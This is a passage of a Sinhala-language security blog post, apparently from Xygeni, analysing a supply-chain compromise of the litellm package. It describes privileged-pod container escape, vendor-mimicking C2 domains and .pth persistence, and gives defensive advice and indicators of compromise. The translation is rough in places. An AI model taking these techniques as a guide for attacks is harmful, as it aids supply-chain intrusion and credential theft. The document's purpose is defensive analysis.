සෑම පොකුරු නෝඩයකම වරප්‍රසාදිත කරල් ස්වයංක්‍රීයව නිර්මාණය කිරීම — සමඟ hostPIDhostNetwork, ධාරක ගොනු පද්ධති සවිකිරීම, සහ chroot ස්ථීරභාවය ස්ථාපනය කිරීමට — තනි සම්මුතිගත වැඩ බරක් සම්පූර්ණ පොකුරු සම්මුතියක් බවට පත් කිරීම සඳහා chains container deployment (T1610) escape to host (T1611) සමඟින්.

4. විකුණුම්කරු-අනුකරණය කරන C2 යටිතල පහසුකම්

භාවිතා කරමින් models.litellm.cloud (ලිටෙල්ම් අනුකරණය කරයි) සහ checkmarx.zone (මිමික්ස් චෙක්මාර්ක්ස්) C2/exfil අන්ත ලක්ෂ්‍ය ලෙස ජාල නිරීක්ෂණය මඟ හැරීමට නිර්මාණය කර ඇත. පිටවීමේ ගමනාගමනය සමාලෝචනය කරන SOC විශ්ලේෂකයින්ට නීත්‍යානුකූල වෙළෙන්දා වසම් ලෙස පෙනෙන දේට HTTPS සම්බන්ධතා පෙනෙනු ඇත.

5. ගුවන් යානය තුළ වේගවත් බර පැටවීමේ පුනරාවර්තනය

ආයාත-කාල ක්‍රියාත්මක කිරීම සමඟ v1.82.7 ප්‍රකාශයට පත් කිරීම, පසුව මිනිත්තු 13 කට පසුව ආරම්භක-කාල ක්‍රියාත්මක කිරීම සමඟ v1.82.8, ප්‍රහාරකයා තත්‍ය කාලීනව නිරීක්ෂණය කිරීම සහ අනුවර්තනය වීම පෙන්වයි. මූලාශ්‍ර කේතයේ සංරක්ෂණය කර ඇති අදහස් දක්වන ලද ගෙවීම් ප්‍රභේද (විවිධ සංකේතාංකන යෝජනා ක්‍රම සමඟ) මෙහෙයුම අතරතුර ක්‍රියාකාරී සංවර්ධනය තහවුරු කරයි.

කළ හැකි දේ

මෙම ප්‍රහාරය සෑම ස්ථරයකම විශ්වාසය ගසාකයි: ආරක්ෂක මෙවලම් කෙරෙහි විශ්වාසය, පැකේජ ලේඛන කෙරෙහි විශ්වාසය, හුරුපුරුදු පෙනුමක් ඇති වසම් කෙරෙහි විශ්වාසය, විශ්වාසය CI/CD ස්වයංක්‍රීයකරණය. එයට එරෙහිව ආරක්ෂා වීමට මෙම විශ්වාස සීමාවන් එක් එක් දැඩි කිරීම අවශ්‍ය වේ:

පැකේජ පාරිභෝගිකයින් සඳහා

  • අනුවාදය පමණක් නොව, හැෂ් මගින් පරායත්තතා පින් කරන්න. pip install litellm==1.82.6 --hash=sha256:... කෙටියෙන් නවතම අනුවාදය ලෙස දර්ශනය වුවද, සම්මුතිගත අනුවාදයන් ස්ථාපනය කිරීම වලක්වනු ඇත.
  • අගුළු ගොනු භාවිතා කරන්න. pip-compilepoetry.lock, සහ uv.lock නිශ්චිත අනුවාද සහ හැෂ් ග්‍රහණය කරගන්න. CI/CD පාවෙන අනුවාද විශේෂණ වලින් නොව, lockfiles වලින් ස්ථාපනය කළ යුතුය.
  • සඳහා නිරීක්ෂණය කරන්න .pth ගොනු. නිතිපතා විගණනය කරන්න site-packages/ අනපේක්ෂිත සඳහා .pth ගොනු — ඒවා සෑම Python ආරම්භයකම ක්‍රියාත්මක වන අතර එය අවතක්සේරු නොකළ නොනැසී පවතින යාන්ත්‍රණයකි.
  • පිටවීමේ ජාල පාලන ක්‍රියාත්මක කරන්න. පිටකිරීම models.litellm.cloud සහ C2 මත විමසුම checkmarx.zone නිෂ්පාදන පරිසරයන් තුළ අවසර ලත් ලැයිස්තු මත පදනම් වූ පිටවීමේ පෙරහන මගින් අල්ලා ගත හැකිව තිබුණි.

පැකේජ නඩත්තු කරන්නන් සඳහා

  • පින් CI/CD ක්‍රියාමාර්ග commit SHA, ටැගය නොවේ. ලයිට්එල්එල්එම් pipeline පින් කළ අනුවාදයක් නොමැතිව Trivy භාවිතා කළා. එය යොමු කර ඇත්නම් aquasecurity/trivy-action@<commit-sha> වෙනුවට @latest, සම්මුතියට පත් වූ ක්‍රියාව ක්‍රියාත්මක නොවනු ඇත.
  • කෙටි කාලීන, විෂය පථය සහිත ප්‍රකාශන ටෝකන භාවිතා කරන්න. PyPI විශ්වාසදායක ප්‍රකාශකයින් (OIDC-පාදක) සහ විෂය පථ API ටෝකන සඳහා සහය දක්වයි. PYPI_PUBLISH ටෝකනයට දිගුකාලීන, සීමා රහිත ප්‍රකාශන ප්‍රවේශයක් නොතිබිය යුතුව තිබුණි.
  • PyPI මත ද්වි-සාධක සත්‍යාපනය සක්‍රීය කරන්න. සියලුම නඩත්තු කරන්නන් සඳහා 2FA අවශ්‍ය වන අතර හැකි සෑම විටම දෘඩාංග ආරක්ෂක යතුරු භාවිතා කරන්න.
  • පැකේජ අත්සන් කරන්න. Sigstore/PEP 740 සහතික කිරීම් මඟින් පාරිභෝගිකයින්ට පැකේජයක් අපේක්ෂිත කාලයට අනුව ගොඩනගා ඇති බව සත්‍යාපනය කිරීමට ඉඩ සලසයි. CI/CD pipeline, සොරකම් කළ ටෝකනයක් සහිත ප්‍රහාරකයෙකු විසින් නොවේ.

වේදිකා ක්‍රියාකරුවන් සඳහා (PyPI, npm, GitHub)

  • අසාමාන්‍ය ප්‍රකාශන රටා හඳුනා ගන්න. සාමාන්‍යයට වඩා වෙනස් IP හෝ ටෝකනයකින් මිනිත්තු 13 ක පරතරයකින් ප්‍රකාශයට පත් කරන ලද නව අනුවාද දෙකක්, පැකේජය ස්ථාපනය කිරීමට පෙර සමාලෝචනය සඳහා රඳවා තබා ගැනීම හෝ ස්වයංක්‍රීය ස්කෑන් කිරීම ක්‍රියාත්මක කළ යුතුය.
  • විශ්වාසදායී ප්‍රකාශකයින්ගේ දරුකමට හදා ගැනීම වේගවත් කරන්න. OIDC මත පදනම් වූ ප්‍රකාශනය, පැකේජ නිශ්චිත ගබඩා සහ වැඩ ප්‍රවාහ සමඟ සම්බන්ධ කරයි, එමඟින් සොරකම් කරන ලද ටෝකන් මුල් පිටපතෙන් පිටත නිෂ්ඵල කරයි. CI/CD සන්දර්භය.
  • ප්‍රකාශන-කාල අනිෂ්ට මෘදුකාංග පරිලෝකනය ක්‍රියාත්මක කරන්න. proxy_server.py හි base64-විකේතනය කරන ලද ගෙවීම් භාරය ප්‍රකාශන අවස්ථාවේදී ස්ථිතික විශ්ලේෂණය මගින් අනාවරණය කර ගත හැකි වනු ඇත.

පරිසර පද්ධතිය සඳහා

  • ආරක්ෂක මෙවලම් අත්‍යවශ්‍ය යටිතල පහසුකම් ලෙස සලකන්න. ට්‍රයිවි සහ චෙක්මාර්ක්ස් KICS මිලියන ගණනක් භාවිතා කරයි pipelines. ඔවුන්ගේ GitHub ක්‍රියාමාර්ග ඔවුන් ස්කෑන් කරන පැකේජ මෙන් දැඩි ලෙස අත්සන් කර, පින් කර, නිරීක්ෂණය කළ යුතුය.
  • ධාවන කාල හඳුනාගැනීම සඳහා ආයෝජනය කරන්න. ස්ථිතික විශ්ලේෂණයට පමණක් සෑම අපැහැදිලි කිරීමේ තාක්ෂණයක්ම ග්‍රහණය කර ගත නොහැක. පැකේජ ස්ථාපනයේ ධාවන කාල නිරීක්ෂණය hooks, අනපේක්ෂිත ජාල සම්බන්ධතා සහ සැක සහිත ගොනු ප්‍රවේශ රටා ගැඹුරින් ආරක්ෂාව සපයයි.
  • තර්ජන බුද්ධිය වේගයෙන් බෙදා ගන්න. වේගවත් හරස්-විකුණුම්කරු සම්බන්ධීකරණයක් සමඟ ලිටෙල්ම් සඳහා පැය 5.5 ක නිරාවරණ කවුළුව කෙටි විය හැකිය. Xygeni MEW, Socket සහ Snyk වැනි ස්වයංක්‍රීය ස්කෑනිං සේවා විෂමතාව අනාවරණය කර ගත්හ - බාධකය වන්නේ මානව තහවුරු කිරීම සහ ලියාපදිංචි ප්‍රතිචාර කාලයයි.

නිගමනය

TeamPCP ව්‍යාපාරය තීරණාත්මක මොහොතකි. software supply chain security. ආරක්ෂක ස්කෑනර් යන්ත්‍ර පළමුවෙන් භාවිතා කිරීමෙන් සහ ඉහළ වටිනාකමක් ඇති AI යටිතල පහසුකම් සඳහා පියවරක් ලෙස භාවිතා කිරීමෙන්, ප්‍රහාරකයින් පෙන්නුම් කළේ සැපයුම් දාමය එහි දුර්වලම සංක්‍රාන්ති යැපීම තරම් ශක්තිමත් බවත්, එම යැපීම ඔබව ආරක්ෂිතව තබා ගැනීමට විශ්වාස කරන ආරක්ෂක මෙවලම විය හැකි බවත්ය.

ලිටෙල්ම් සම්මුතිය විශේෂයෙන් AI යටිතල පහසුකම් සඳහා වර්ධනය වන අවදානම ඉස්මතු කරයි. LLM ප්‍රොක්සි ද්වාර බවට පත්වන විට standard සඳහා රටාව enterprise AI යෙදවීමේදී, ඔවුන් API යතුරු, වලාකුළු අක්තපත්‍ර සහ සංවේදී දත්ත වෙත ප්‍රවේශය තනි සංරචකයක් තුළ සංකේන්ද්‍රණය කරයි. එම සංරචකය සම්මුතියකට පත් කිරීම සමස්ත AI තොගයටම ඇටසැකිලි යතුරකි.

පැය 5.5 ක කාලය තුළ litellm 1.82.7 හෝ 1.82.8 ස්ථාපනය කළ සංවිධාන මෙය සම්පූර්ණ අක්තපත්‍ර සම්මුතියක් ලෙස සැලකිය යුතුය: බලපෑමට ලක් වූ පද්ධතිවල සියලුම රහස් මාරු කරන්න, Kubernetes පොකුරු විගණනය කරන්න node-setup-* කරල් kube-system, ඕනෑම එකක් ඉවත් කරන්න sysmon.service systemd ඒකක, සහ පරීක්ෂා කරන්න litellm_init.pth පයිතන් හි site-packages/ නාමාවලි. නිල ඩෝකර් රූපයේ පරිශීලකයින් (ghcr.io/berriai/litellm) බලපෑමට ලක් නොවීය, මන්ද රූපය එහි පරායත්තතා අමුණන ලද අතර නිරාවරණ කවුළුව තුළ නැවත ගොඩනඟා නොතිබුණි.

කර්තෘ ගැන

සම-නිර්මාතෘ සහ CTO

ලුයිස් රොඩ්රිගස් Xygeni Security හි සම-නිර්මාතෘ සහ CTO වේ. යෙදුම් ආරක්ෂාව පිළිබඳ වසර 20+ ක පළපුරුද්දක් ඇති ඔහු, කණ්ඩායම්වලට සැබෑ බෙදාහැරීමේ අවදානම අඩු කිරීමට උපකාරී වන AppSec ආරක්ෂාව සහ උසස් කේත විශ්ලේෂණ හැකියාවන් කෙරෙහි අවධානය යොමු කරයි.

 
sca-මෙවලම්-මෘදුකාංග-සංයුතිය-විශ්ලේෂණ-මෙවලම්
ඔබේ මෘදුකාංග අවදානම් ප්‍රමුඛතාවය දෙන්න, නිවැරදි කරන්න සහ සුරක්ෂිත කරන්න
ඔබගේ නොමිලේ ගිණුම ලබා ගන්න.
කිසිදු ක්රෙඩිට් කාඩ්පතක් අවශ්ය නොවේ.

ඔබේ මෘදුකාංග සංවර්ධනය සහ බෙදා හැරීම සුරක්ෂිත කරන්න

Xygeni නිෂ්පාදන කට්ටලය සමඟ